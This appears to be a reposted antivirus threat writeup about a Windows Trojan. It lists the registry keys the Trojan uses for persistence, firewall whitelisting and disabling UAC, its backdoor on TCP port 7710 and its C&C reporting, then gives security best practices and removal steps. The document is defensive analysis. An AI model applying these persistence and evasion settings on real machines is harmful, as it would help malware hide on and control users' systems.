  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"Windows-Network Component" = "%Program Files%\Common Files\lsmass.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Windows-Audio Driver" = "%UserProfile%\Application Data\wscntfy.exe"

It then creates the following registry entry to add itself to the list of applications authorized by the Windows firewall:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\"%UserProfile%\Application Data\wscntfy.exe" = "%UserProfile%\Application Data\wscntfy.exe:*:Enabled:Windows-Audio Driver"

It also creates the following registry entries:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Hidden" = "2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"EnableBalloonTips" = "0"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CLSID}\"IsInstalled" = "1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CLSID}\"StubPath" = "%UserProfile%\Application Data\wscntfy.exe -r"

The Trojan creates the following mutex to ensure that only one copy of itself executes:

Next, the Trojan sends system information to a remote location, including:
  • Computer name
  • Language
  • OS version

It then opens a back door on TCP port 7710 to receive commands from the following remote command-and-control (C&C) server:

The Trojan then downloads files onto the compromised computer and saves them to the following locations:
  • %UserProfile%\Application Data\Microsoft\CryptnetUrlCache\MetaData\[THREAT FILE NAME]
  • %UserProfile%\Application Data\Microsoft\CryptnetUrlCahce\Content\[THREAT FILE NAME]

Recommendations :-

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":
  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
How To Remove ?

Before proceeding further we recommend that you run a full system scan by using "Antivirus". If that does not resolve the problem you can try one of the options available below.

If you are a Norton product user, we recommend you try the following resources to remove this risk.

Removal Tool

  • Run Norton Power Eraser (NPE)
  • Norton Power Eraser did not remove this risk

If you have an infected Windows system file, you may need to replace it using the Windows installation CD.

How to reduce the risk of infection
The following resources provide further information and best practices to help reduce the risk of infection.
  • Operating system updates to fix vulnerabilities
  • File sharing protection
  • Disable Autorun (CD/USB)
  • Best practices for instant messaging
  • Best practices for browsing the Web
  • Best practices for email

If you are a Symantec business product user, we recommend you try the following resources to remove this risk.

Identifying and submitting suspect files
Submitting suspicious files to Symantec allows us to ensure that our protection capabilities keep up with the ever-changing threat landscape. Submitted files are analyzed by Symantec Security Response and, where necessary, updated definitions are immediately distributed through LiveUpdate™ to all Symantec end points. This ensures that other computers nearby are protected from attack. The following resources may help in identifying suspicious files for submission to Symantec.
  • Locate a sample of a threat
  • Submit a suspicious file to Symantec

Removal Tool
  • Run the Symantec Power Eraser with the Symantec Endpoint Protection Support Tool
  • Symantec Power Eraser Overview
  • Symantec Power Eraser User Guide

If you have an infected Windows system file, you may need to replace it using the Windows installation CD.

How to reduce the risk of infection
The following resource provides further information and best practices to help reduce the risk of infection.
Protecting your business network

The following instructions pertain to all current Symantec antivirus products.

1. Performing a full system scan with Antivirus

2. Restoring settings in the registry
Many risks make modifications to the registry, which could impact the functionality or performance of the compromised computer. While many of these modifications can be restored through various Windows components, it may be necessary to edit the registry. See in the Technical Details of this writeup for information about which registry keys were created or modified. Delete registry subkeys and entries created by the risk and return all modified registry entries to their previous values.

Related Posts Plugin for WordPress, Blogger...